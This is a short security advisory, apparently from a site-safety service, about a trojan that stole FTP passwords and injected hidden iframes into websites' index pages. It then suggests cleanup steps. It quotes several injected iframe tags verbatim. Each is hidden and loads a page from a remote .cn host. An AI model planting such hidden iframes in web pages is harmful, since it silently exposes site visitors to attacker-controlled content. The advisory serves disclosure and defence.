• 
We recently received a report of a client of ours whos site was blacklisted from google unbeknowst to his team and it appears a trojan was installed on the host pc and worked its way into the FTP program and hijacked the FTP user name and passwords of all the sites in the FTP list. It then attacked the index.php, asp, html, htm pages and installs this little bugger:
><iframe src="http://shopmoviefestival.cn:8080/index.php" width=158 height=140 style="visibility: hidden"></iframe>
or
<iframe src="http://shopfilmlifescience.cn:8080/index.php" width=151 height=110 style="visibility: hidden"></iframe>
<iframe src="http://gianthighest.cn:8080/index.php" width=150 height=181 style="visibility: hidden"></iframe>
or
<iframe rel="nofollow" src="/interstitial?uri=http://shopmoviefestival.cn:8080/index.php" height="134" width="170">
</iframe>
we also got reports of that actual URL changing as well but we did notice it only targets the homepages or any file even in the control panel with a /index. Some suggestions are:
In your index.html, php, html, htm, etc... right after your opening body tag you have an iframe link to http://shopmoviefestival.cn:8080/index.php that’s hidden. You’ll need to remove this.
Did you scan your PC with AVG, spybot and Malwarebytes?
Did you change your FTP password?
Did you change your protocol from FTP to either SFTP or FTPS?
Did you change to a non-administrator account on your PC?
We hope this keeps you and your websites safe. As always feel free to contact us with any fixes, solutions or reports.
Internet Safe List